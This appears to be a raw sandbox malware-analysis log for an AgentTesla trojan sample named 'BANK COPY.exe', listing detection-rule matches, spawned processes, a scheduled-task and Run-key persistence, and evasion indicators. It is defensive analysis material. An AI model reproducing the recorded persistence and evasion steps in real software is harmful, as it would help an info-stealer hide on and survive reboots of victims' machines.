                  Source: 00000007.00000000.280231622.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                  Source: 00000000.00000002.290430667.0000000003BF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                  Source: Process Memory Space: BANK COPY.exe PID: 5724, type: MEMORYSTRMatched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, score = file, reference = Internal Research
                  Source: Process Memory Space: BANK COPY.exe PID: 5724, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                  Source: Process Memory Space: RegSvcs.exe PID: 4692, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                  Source: C:\Users\user\Desktop\BANK COPY.exeCode function: 0_2_02ADE8200_2_02ADE820
                  Source: C:\Users\user\Desktop\BANK COPY.exeCode function: 0_2_02ADE8100_2_02ADE810
                  Source: C:\Users\user\Desktop\BANK COPY.exeCode function: 0_2_02ADBF540_2_02ADBF54
                  Source: C:\Users\user\Desktop\BANK COPY.exeCode function: 0_2_075B3FA00_2_075B3FA0
                  Source: C:\Users\user\Desktop\BANK COPY.exeCode function: 0_2_075B56300_2_075B5630
                  Source: C:\Users\user\Desktop\BANK COPY.exeCode function: 0_2_075B2D000_2_075B2D00
                  Source: C:\Users\user\Desktop\BANK COPY.exeCode function: 0_2_075BD4680_2_075BD468
                  Source: C:\Users\user\Desktop\BANK COPY.exeCode function: 0_2_075B4C100_2_075B4C10
                  Source: C:\Users\user\Desktop\BANK COPY.exeCode function: 0_2_075B63F80_2_075B63F8
                  Source: C:\Users\user\Desktop\BANK COPY.exeCode function: 0_2_075BC0700_2_075BC070
                  Source: C:\Users\user\Desktop\BANK COPY.exeCode function: 0_2_075B97700_2_075B9770
                  Source: C:\Users\user\Desktop\BANK COPY.exeCode function: 0_2_075B97260_2_075B9726
                  Source: C:\Users\user\Desktop\BANK COPY.exeCode function: 0_2_075B56230_2_075B5623
                  Source: C:\Users\user\Desktop\BANK COPY.exeCode function: 0_2_075B56200_2_075B5620
                  Source: C:\Users\user\Desktop\BANK COPY.exeCode function: 0_2_075B7ED00_2_075B7ED0
                  Source: C:\Users\user\Desktop\BANK COPY.exeCode function: 0_2_075B3EE10_2_075B3EE1
                  Source: C:\Users\user\Desktop\BANK COPY.exeCode function: 0_2_075B7EE00_2_075B7EE0
                  Source: C:\Users\user\Desktop\BANK COPY.exeCode function: 0_2_075BC5400_2_075BC540
                  Source: C:\Users\user\Desktop\BANK COPY.exeCode function: 0_2_075B85C00_2_075B85C0
                  Source: C:\Users\user\Desktop\BANK COPY.exeCode function: 0_2_075B85B00_2_075B85B0
                  Source: C:\Users\user\Desktop\BANK COPY.exeCode function: 0_2_075B8C400_2_075B8C40
                  Source: C:\Users\user\Desktop\BANK COPY.exeCode function: 0_2_075B4C000_2_075B4C00
                  Source: C:\Users\user\Desktop\BANK COPY.exeCode function: 0_2_075B8C300_2_075B8C30
                  Source: C:\Users\user\Desktop\BANK COPY.exeCode function: 0_2_075B33400_2_075B3340
                  Source: C:\Users\user\Desktop\BANK COPY.exeCode function: 0_2_075B33300_2_075B3330
                  Source: C:\Users\user\Desktop\BANK COPY.exeCode function: 0_2_075B63300_2_075B6330
                  Source: C:\Users\user\Desktop\BANK COPY.exeCode function: 0_2_075B63890_2_075B6389
                  Source: C:\Users\user\Desktop\BANK COPY.exeCode function: 0_2_075B8A520_2_075B8A52
                  Source: C:\Users\user\Desktop\BANK COPY.exeCode function: 0_2_075B8A600_2_075B8A60
                  Source: C:\Users\user\Desktop\BANK COPY.exeCode function: 0_2_075B82000_2_075B8200
                  Source: C:\Users\user\Desktop\BANK COPY.exeCode function: 0_2_075BD9380_2_075BD938
                  Source: C:\Users\user\Desktop\BANK COPY.exeCode function: 0_2_075B81F00_2_075B81F0
                  Source: C:\Users\user\Desktop\BANK COPY.exeCode function: 0_2_075B88180_2_075B8818
                  Source: C:\Users\user\Desktop\BANK COPY.exeCode function: 0_2_075B88080_2_075B8808
                  Source: C:\Users\user\Desktop\BANK COPY.exeCode function: 0_2_080200400_2_08020040
                  Source: C:\Users\user\Desktop\BANK COPY.exeCode function: 0_2_080200060_2_08020006
                  Source: C:\Users\user\Desktop\BANK COPY.exeCode function: 0_2_080202830_2_08020283
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0626BB187_2_0626BB18
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0626C8787_2_0626C878
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_06261FF87_2_06261FF8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_062600407_2_06260040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_069022E87_2_069022E8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_06904D007_2_06904D00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_069011807_2_06901180
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0697C7C07_2_0697C7C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_069793387_2_06979338
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_06974C687_2_06974C68
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_06972DE07_2_06972DE0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_06976D187_2_06976D18
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0697E9507_2_0697E950
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_069744187_2_06974418
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_069792D47_2_069792D4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_06972D807_2_06972D80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_06976BC87_2_06976BC8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_069AC7E87_2_069AC7E8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_069A65F07_2_069A65F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_069A721A7_2_069A721A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_069A1D287_2_069A1D28
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_069ADBD87_2_069ADBD8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_069A33307_2_069A3330
                  Source: BANK COPY.exe, 00000000.00000000.238693241.0000000000844000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameEKbM.exe6 vs BANK COPY.exe
                  Source: BANK COPY.exe, 00000000.00000003.265022832.0000000003248000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMajorRevision.exe< vs BANK COPY.exe
                  Source: BANK COPY.exe, 00000000.00000002.308217029.00000000074B0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMajorRevision.exe< vs BANK COPY.exe
                  Source: BANK COPY.exe, 00000000.00000002.284491796.0000000002BF1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBunifu.UI.dll4 vs BANK COPY.exe
                  Source: BANK COPY.exe, 00000000.00000002.284491796.0000000002BF1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemqWKvSGkaDYLcvnhfrECeVwbtwhMnIPPYdRhIA.exe4 vs BANK COPY.exe
                  Source: BANK COPY.exe, 00000000.00000002.290430667.0000000003BF9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemqWKvSGkaDYLcvnhfrECeVwbtwhMnIPPYdRhIA.exe4 vs BANK COPY.exe
                  Source: BANK COPY.exe, 00000000.00000002.282858977.0000000000E1A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs BANK COPY.exe
                  Source: BANK COPY.exe, 00000000.00000002.292700104.0000000003DD4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMajorRevision.exe< vs BANK COPY.exe
                  Source: BANK COPY.exe, 00000000.00000002.292700104.0000000003DD4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameEKbM.exe6 vs BANK COPY.exe
                  Source: BANK COPY.exeBinary or memory string: OriginalFilenameEKbM.exe6 vs BANK COPY.exe
                  Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe 43026DCFF238F20CFF0419924486DEE45178119CFDD0D366B79D67D950A9BF50
                  Source: BANK COPY.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: gPxsznxm.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: BANK COPY.exeVirustotal: Detection: 54%
                  Source: BANK COPY.exeReversingLabs: Detection: 39%
                  Source: C:\Users\user\Desktop\BANK COPY.exeFile read: C:\Users\user\Desktop\BANK COPY.exeJump to behavior
                  Source: BANK COPY.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\BANK COPY.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\BANK COPY.exe "C:\Users\user\Desktop\BANK COPY.exe"
                  Source: C:\Users\user\Desktop\BANK COPY.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gPxsznxm" /XML "C:\Users\user\AppData\Local\Temp\tmp1205.tmp
                  Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\BANK COPY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe {path}
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe "C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe"
                  Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe "C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe"
                  Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\BANK COPY.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gPxsznxm" /XML "C:\Users\user\AppData\Local\Temp\tmp1205.tmpJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe {path}Jump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\BANK COPY.exeFile created: C:\Users\user\AppData\Roaming\gPxsznxm.exeJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeFile created: C:\Users\user\AppData\Local\Temp\tmp1205.tmpJump to behavior
                  Source: classification engineClassification label: mal100.troj.adwa.spyw.evad.winEXE@10/8@1/1
                  Source: C:\Users\user\Desktop\BANK COPY.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: BANK COPY.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                  Source: C:\Users\user\Desktop\BANK COPY.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5144:120:WilError_01
                  Source: C:\Users\user\Desktop\BANK COPY.exeMutant created: \Sessions\1\BaseNamedObjects\VvtJSeKnwrzeyitZ
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3896:120:WilError_01
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3768:120:WilError_01
                  Source: BANK COPY.exeString found in binary or memory: Address:/AddressToolStripTextBox-AddressToolStripButton'ToolStripSeparator3'PhoneToolStripLabel
                  Source: BANK COPY.exeString found in binary or memory: Address:/AddressToolStripTextBox-AddressToolStripButton'ToolStripSeparator3'PhoneToolStripLabel
                  Source: 7.0.RegSvcs.exe.400000.0.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                  Source: 7.0.RegSvcs.exe.400000.0.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\Desktop\BANK COPY.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: BANK COPY.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: BANK COPY.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: RegSvcs.pdb, source: yqWDN.exe, 0000000E.00000000.307818676.00000000006E2000.00000002.00000001.01000000.00000009.sdmp, yqWDN.exe.7.dr
                  Source: Binary string: RegSvcs.pdb source: yqWDN.exe, 0000000E.00000000.307818676.00000000006E2000.00000002.00000001.01000000.00000009.sdmp, yqWDN.exe.7.dr

                  Data Obfuscation

                  barindex
                  Source: BANK COPY.exe, AddCompanyForm.cs.Net Code: NewLateBinding.LateCall(dax, null, "Invoke", stackVariable4, null, null, stackVariable13, true)
                  Source: gPxsznxm.exe.0.dr, AddCompanyForm.cs.Net Code: NewLateBinding.LateCall(dax, null, "Invoke", stackVariable4, null, null, stackVariable13, true)
                  Source: 0.0.BANK COPY.exe.780000.0.unpack, AddCompanyForm.cs.Net Code: NewLateBinding.LateCall(dax, null, "Invoke", stackVariable4, null, null, stackVariable13, true)
                  Source: C:\Users\user\Desktop\BANK COPY.exeCode function: 0_2_08025045 push FFFFFF8Bh; iretd 0_2_08025047
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0626AE26 push es; retf 7_2_0626AE28
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0626AE22 push es; retf 7_2_0626AE24
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0626AE2E push es; retf 7_2_0626AE30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0626AE2A push es; retf 7_2_0626AE2C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0626AE36 push es; retf 7_2_0626AE38
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0626AE32 push es; retf 7_2_0626AE34
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0626AE3A push es; retf 7_2_0626AE3C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0626AE16 push es; retf 7_2_0626AE18
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0626AE1E push es; retf 7_2_0626AE20
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0626AE1A push es; retf 7_2_0626AE1C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0626AE5D push es; retf 7_2_0626AE84
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0626AC41 push es; retf 7_2_0626ACBC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0626ACBE push es; retf 7_2_0626AD54
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0626AD56 push es; retf 7_2_0626AE14
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0626AA09 push es; retf 7_2_0626AC24
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_06263139 push es; iretd 7_2_0626313C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_069A6ED4 push ss; retf 7_2_069A6ED7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_069A165F push es; ret 7_2_069A18C4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_069A166A push es; ret 7_2_069A18C4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_069ABC59 push es; iretd 7_2_069ABC5C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_069ABC5D push es; iretd 7_2_069ABC60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_069ABC51 push es; iretd 7_2_069ABC54
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_069ABC55 push es; iretd 7_2_069ABC58
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_069ABC4D push es; iretd 7_2_069ABC50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_069ABC71 push es; iretd 7_2_069ABC74
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_069ABC69 push es; iretd 7_2_069ABC6C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_069ABC6D push es; iretd 7_2_069ABC70
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_069ABC61 push es; iretd 7_2_069ABC64
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_069ABC65 push es; iretd 7_2_069ABC68
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_069ABBE2 push es; iretd 7_2_069ABC4C
                  Source: initial sampleStatic PE information: section name: .text entropy: 7.749151091847694
                  Source: initial sampleStatic PE information: section name: .text entropy: 7.749151091847694
                  Source: C:\Users\user\Desktop\BANK COPY.exeFile created: C:\Users\user\AppData\Roaming\gPxsznxm.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeJump to dropped file

                  Boot Survival

                  barindex
                  Source: C:\Users\user\Desktop\BANK COPY.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gPxsznxm" /XML "C:\Users\user\AppData\Local\Temp\tmp1205.tmp
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run yqWDNJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run yqWDNJump to behavior

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe:Zone.Identifier read attributes | deleteJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
